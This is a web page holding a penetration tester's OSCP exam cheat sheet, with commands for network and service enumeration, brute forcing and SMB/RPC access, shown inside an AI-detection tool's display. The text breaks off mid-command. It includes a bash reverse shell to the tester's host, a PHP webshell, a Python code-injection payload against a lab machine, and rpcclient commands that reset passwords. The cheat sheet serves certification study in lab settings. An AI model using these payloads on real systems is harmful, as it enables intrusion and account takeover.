Skip to content
HN On Hacker News ↗

My OSCP Pentesting Cheatsheet

▲ 22 points 4 comments by HackerAsk 1w ago HN discussion ↗

Pangram verdict · v3.3

We believe that this document is fully human-written

1 %

AI likelihood · overall

Human
100% human-written 0% AI-generated
SEGMENTS · HUMAN 8 of 8
SEGMENTS · AI 0 of 8
WORD COUNT 1,587
PEAK AI % 0% · §7
Analyzed
Jul 1
backend: pangram/v3.3
Segments scanned
8 windows
avg 198 words each
Distribution
100 / 0%
human / AI fraction
Verdict
Human
Pangram v3.3

Article text · 1,587 words · 8 segments analyzed

Human AI-generated
§1 Human · 0%

I had my OSCP exam on 14.03.2025 and on 17 March, three days later, I already received the confirmation, that I had passed the OSCP exam!This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post, I can find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post exploitation that can be useful for penetration testing and the OSCP exam.Some useful Tips.env fileI created a separate directory for each machine that I hacked during my preparation and the OSCP exam. I then created an .env file in each of these directories and stored useful environment variables such as $TARGET_IP and $TARGET_DOMAIN in them:1 2 export TARGET_IP="10.10.10.11" export TARGET_DOMAIN="hackerask.com" Then I could simply source the .env file whenever I wanted to work on this machine:1 source .env This is especially useful when you are working with multiple terminal tabs.You can also use this file to store other environment variables that you use frequently, such as credentials or to run scripts, such as starting a terminal logger.$myip environment variableI found it quite useful to have my IP address in a $myip environment variable. Since all the hacking lab platforms I use, such as HackTheBox, Proving Grounds or the challenge labs for my OSCP exam, use OpenVPN to get access to the machines, we can look at the tun0 network interface to see our local VPN IP address. We can look at it with ifconfig tun0 or ip addr show tun0.To avoid having to type in the IP address every time I need it, I created a $myip environment variable that looks like this:1 export myip=$(ip addr show tun0 2> /dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1) We can add the export

§2 Human · 0%

line to our .bashrc or .zshrc and then source the file, to be able to use the environment variable:1 2 3 $ echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1"

/bin/bash -i >& /dev/tcp/192.168.178.10/5555 0>&1 This will output the reverse shell payload with our IP address of the tun0 network interface.Copy AliasI often have to copy the output of commands from the terminal to document them in my notes. Therefore I created an easy copy alias to pipe the output of an command into the clipboard.I decided to use xclip, which can be installed with apt:1 sudo apt install xclip To create the alias, we can add the following line to the .bashrc or .zshrc file:1 alias copy='xclip -selection clipboard' And then restart the terminal session or source the file to be able to use it.We can use the copy alias, by appending it with a pipe:1 echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" | copy This will pipe the output of the echo command, the reverse-shell payload, to our clipboard.TmuxYou should definitely learn and use tmux for the OSCP and for doing penetration tests/red team assignments. tmux is an excellent terminal multiplexer that allows you to manage multiple tabs and screens within a single window, making it easy to switch between various tabs with easy keyboard shortcuts.Tmux Cheat Sheet & Quick ReferenceNetwork EnumerationGeneralHost Discovery1 2 3 nmap -sn 192.168.178.1-254 -vv -oA hosts

cat hosts.nmap | grep "report for" | grep -v "down" | cut -f5 -d ' ' If nmap does not work, we can also try to ping the

§3 Human · 0%

hosts:1 for i in $(seq 1 254); do ping "172.16.115.$i" -c 1 -W 0.1|grep "icmp_seq=1"|cut -f4 -d ' '|tr ':' ' '; done Port ScanningMy first step is usually to scan the machine quickly with nmap for open TCP ports:1 $ sudo nmap -p- -vvv $TARGET_IP -oN enum/nmap/quick-scan.txt Then I can use the following command to get all ports comma separated as output:1 $ cat enum/nmap/quick-scan.txt | grep '/tcp' | cut -f1 -d '/' | tr '\n' ',' | sed 's/\(.*\),/\1 /' Then we can use the open ports to do a more detailed version scan:1 $ nmap -p<ports> -sC -sV -oA enum/nmap/resource $TARGET_IP After scanning the TCP ports, we should not forget to scan for UDP ports as well:1 $ sudo nmap -Pn -n $TARGET_IP -sUV --top-ports=100 --reason -oA enum/nmap/resource-udp TCP21 - FTPAnonymous Login:1 ftp ftp://anonymous:anonymous@$TARGET_IP Banner grabbing:1 nc -vn $TARGET_IP 21 Download all files:1 2 wget -m ftp://anonymous:anonymous@$TARGET_IP wget -r --user="USERNAME" --password="PASSWORD" ftp://$TARGET_IP/ Brutefoce:1 hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $TARGET_IP ftp 22 - SSHNmap:1 2 3 4 5 # Check Authentication Methods: nmap -p22 $TARGET_IP --script

§4 Human · 0%

ssh-auth-methods --script-args="ssh.user=root"

# Retrieve Version nmap -p22 $TARGET_IP -sV Brutefoce:1 hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt $TARGET_IP ssh 23 - TelnetBanner Grabbing:1 nc -vn $TARGET_IP 23 Nmap Enumeration:1 nmap -n -sV -Pn --script "*telnet* and safe" -p 23 $TARGET_IP The script telnet-ntlm-info.nse can obtain NTLM info.25,465,587 - SMTPBanner Grabbing:1 2 3 $ rlwrap nc -vn $TARGET_IP 25 HELO AUTH Nmap:1 2 nmap -p25 --script smtp* -v $TARGET_IP # smpt-commands smtp-enum-users smtp-open-relay Send Emails:1 sudo swaks -t to@receiver.com --from from@sender.com --server $TARGET_IP --header "Subject: TEXT" --body @body.txt --attach @file.pdf --suppress-data -ap 53 - DNSTry zone transfer:1 2 dig axfr @$TARGET_IP dig axfr @$TARGET_IP $TARGET_DOMAIN Get more information:1 dig ANY @$TARGET_IP $TARGET_DOMAIN 79 - fingerWe can use finger-user-enum.pl to enumerate users:1 2 3 $ perl ~/hacking/scripts/kali/finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t $TARGET_IP > finger_enum_log.txt

$ cat finger_enum_log.txt | grep -v "is not known" | grep "Login:" | cut -f3 -d ' ' 80,443 - HTTP1 2

§5 Human · 0%

3 4 5 6 7 gobuster dir -u "http://$TARGET_IP/" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -o enum/web/80-gobuster.txt

gobuster dir -u "http://$TARGET_IP/" -w /usr/share/wordlists/dirb/big.txt -o enum/web/80-gobuster.txt

dirsearch -u http://$TARGET_IP -r -o enum/web/80-dirsearch.txt

feroxbuster --url http://$TARGET_IP Wordpress Scanner:1 2 wpscan --url http://$TARGET_IP -e ap,t,tt,u # Enumerate: -e with ap: All plugins, t: Popular Themes, tt: Timthumbs and u:User IDs range 1-10 Serve Webdav:1 cadaver http://$TARGET_IP Nikto Web Vulnerability Scanning:1 nikto -host=http://$TARGET_IP -output=enum/web/80-nikto.txt API Testing:1 2 3 4 5 6 7 8 9 10 # This is a example from the PG Machine Hetemit # [Werkzeug httpd 1.0.1 (Python 3.6.8) Server] $ curl -i http://192.168.143.117:50000/verify -X POST --data "code=asdf" Internal Server Error

$ curl -i http://192.168.143.117:50000/verify -X POST --data "code=5*5" 25

$ curl -i http://192.168.143.117:50000/verify -X POST --data "code=__import__('os').popen('whoami').read()" username /etc/hosts:1 echo "$TARGET_IP\t$TARGET_DOMAIN" | copy IIS Shortnames](../../techniques/iis-shortname.md: Some IIS Server are vulnerable to IIS tilde / shortname enumeration.

§6 Human · 0%

IIS-ShortName-Scanner:1 2 3 4 5 $ git clone git@github.com:irsdl/IIS-ShortName-Scanner.git $ cd IIS-ShortName-Scanner/Docker/ $ docker build . -t shortname

$ docker run shortname 2 20 http://$TARGET_IP Basic php webshell:1 echo '<?php echo system($_GET["cmd"]); ?>' > shell.php 88 - Kerberos AuthenticationNot much here todo. You can just try bruteforcing:1 nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="$TARGET_DOMAIN",userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt $TARGET_IP Try to get service tickets: (Username/Password required):1 sudo impacket-GetUserSPNs -request -dc-ip <ip> <domain>/<username> 110,995 - POPEnumeration:1 2 3 4 nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110,995 $TARGET_IP

# Just execute all POP scripts nmap --script pop* -sV -p 110,995 $TARGET_IP Interacting with pop:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 # Syntax POP commands: USER uid Log in as "uid" PASS password Substitue "password" for your actual password STAT List number of messages, total mailbox size LIST List messages and sizes RETR n Show message n DELE n Mark message n for deletion RSET Undo any changes QUIT Logout (expunges messages if no RSET) TOP msg n Show first n lines of message number msg

§7 Human · 0%

CAPA Get capabilities

# Command $ rlwrap nc -vn $TARGET_IP 110 User jonas +OK PASS password +OK Welcome jonas

LIST +OK 2 1807 1 786 2 1021

retr 1 .... 135,593 - MSRPCNmap:1 nmap --script msrpc-enum -p 135 $TARGET_IP Rpcdump:1 impacket-rpcdump -port 135 $TARGET_IP | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR' MS-EFSRPC: It might be vulnerable to PetitPotam.MS-RPRN, MS-PAR: It might be vulnerable to PrintNightmare (PoC)RPC Client:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 # Anonymous logon: rpcclient -N -U '' -p 135 $TARGET_IP

# -k : Kerberos Authentication rpcclient -k $TARGET_IP

# --- Commands --- # Server info rpcclient $> srvinfo # Enumerate domains rpcclient $> enumdomains # Enumerate domain users rpcclient $> enumdomusers # Enumerate domain groups rpcclient $> enumdomgroups # Domain info rpcclient $> querydominfo # Current username rpcclient $> getusername If we have valid user credentials we can connect with rpcclient and enumerate groups and users:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $

§8 Human · 0%

rpcclient -U <domain>/<user>%<password> $TARGET_IP

> enumdomgroups > enumdomusers > querygroupmem <rid> > queryusergroups <rid>

# We can try to modify account information with setuserinfo # The level parameter referse to the level of detail we want to modify user account data # 0: Basic information, username,fullname # 1: Additional information, home directory, script path, profile path # 2: Further information, password age, privileges, logon script # 3: Detailed information, including all above and group membership # 4: Even more detailed, including all above and security identifier (SID)

# To change a password we can use setuserinfo2, with a level of 2,3. > setuserinfo <username> 23 '<new-password>' 139,445 - SMBNull Session:1 2 3 4 5 smbclient -N -L \\\\$TARGET_IP\\

nxc smb $TARGET_IP -u '' -p '' nxc smb $TARGET_IP -u '' -p '' --shares nxc smb $TARGET_IP -u '' -p '' --users SMB Login with “guest”:1 2 3 impacket-smbclient zeus/guest@$TARGET_IP # or smbmap -H $TARGET_IP -u guest -d $TARGET_DOMAIN If we have credentials for a target but can only login with SMB, we can try to execute a command with it:1 nxc smb $TARGET_IP -u <username> -p <password> -X 'powershell -e